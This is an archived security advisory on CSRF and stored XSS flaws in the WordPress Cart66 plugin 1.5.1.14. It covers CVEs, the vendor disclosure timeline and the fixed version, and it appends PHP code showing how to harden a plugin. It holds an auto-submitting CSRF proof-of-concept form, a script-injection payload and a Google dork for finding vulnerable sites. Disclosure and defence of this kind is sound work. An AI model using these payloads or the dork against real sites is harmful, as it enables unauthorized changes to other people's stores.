SECURITYVULNS:DOC:29955
Oct 27, 2013

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-27 00:00:00
vulners.com

Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

Exploit Author: absane

Blog: http://blog.noobroot.com

Discovery date: September 29th 2013

Vendor notified: September 29th 2013

Vendor fixed: October 12 2013

Vendor Homepage: http://cart66.com

Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip

Tested on: Wordpress 3.6.1

Google-dork: inurl:/wp-content/plugins/cart66

CVE (CSRF): CVE-2013-5977

CVE (XSS): CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1


*** CSRF ***


Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

================
Proof of Concept

<html><body>
<!-- Forged "save product" request; the target page does not require a nonce, so a logged-in admin visiting this page creates the product. -->
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' />
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value="" />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
</form>
<!-- Auto-submit as soon as the page loads. -->
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

VULNERABILITY #2


*** Code Injection ***


Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:

  • Product name
  • Price description

================
Proof of Concept

In the vulnerable fields enter <script>alert(0)</script> or any other code. The value is written directly into the database without sanitization.

Because the input is not sanitized on save and not escaped on output, where and when the stored code executes depends on which theme or template renders the product fields. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product.
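As an added example (not Cart66's code or the vendor's 1.5.1.15 patch), this is the defensive pattern a WordPress plugin's product-save handler should follow to close both issues above: a capability check and a nonce that the cross-site form in the CSRF PoC cannot supply, plus sanitizing on save and escaping on output so a product name such as <script>alert(0)</script> is stored and rendered as inert text. The WordPress API calls are real; the function names, hook, field names and table name are assumptions for illustration.

```php
<?php
// Added example: hardened "save product" handling for a WordPress admin page.
// Real WordPress APIs; example_* names, fields and the table name are assumed.

// 1. Render the form with a nonce. A page on another origin (the CSRF PoC)
//    cannot read this value, so a forged POST fails the check in step 2.
function example_render_product_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=cart66-products' ) ) . '">';
    wp_nonce_field( 'example_save_product', 'example_product_nonce' );
    echo '<input type="hidden" name="cart66-action" value="save product" />';
    echo '<input type="text" name="product[name]" />';
    echo '<input type="text" name="product[price_description]" />';
    submit_button( 'Save product' );
    echo '</form>';
}

// 2. Handle the POST: check who is asking, check the nonce, sanitize, then store.
function example_handle_save_product() {
    if ( ! isset( $_POST['cart66-action'] ) || 'save product' !== $_POST['cart66-action'] ) {
        return;
    }
    // Capability check: only users allowed to manage the store may save products.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Nonce check: dies with an error page on failure, which defeats the forged form.
    check_admin_referer( 'example_save_product', 'example_product_nonce' );

    $raw = ( isset( $_POST['product'] ) && is_array( $_POST['product'] ) ) ? $_POST['product'] : array();
    $product = array(
        // sanitize_text_field() strips tags, so "<script>alert(0)</script>"
        // never reaches the database as markup.
        'name'              => sanitize_text_field( wp_unslash( $raw['name'] ?? '' ) ),
        'price_description' => sanitize_text_field( wp_unslash( $raw['price_description'] ?? '' ) ),
        'price'             => floatval( $raw['price'] ?? 0 ),
        'item_number'       => sanitize_text_field( wp_unslash( $raw['item_number'] ?? '' ) ),
    );

    global $wpdb;
    $table = $wpdb->prefix . 'example_products'; // assumed table name
    // Format array keeps the insert parameterized.
    $wpdb->insert( $table, $product, array( '%s', '%s', '%f', '%s' ) );
}
add_action( 'admin_init', 'example_handle_save_product' );

// 3. Escape on output too: sanitizing on input does not replace escaping at the
//    point of rendering, which is where the theme in this report ran the payload.
function example_render_product_name( $name ) {
    return esc_html( $name );
}
```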

================
Solutions

Update to version 1.5.1.15 or greater.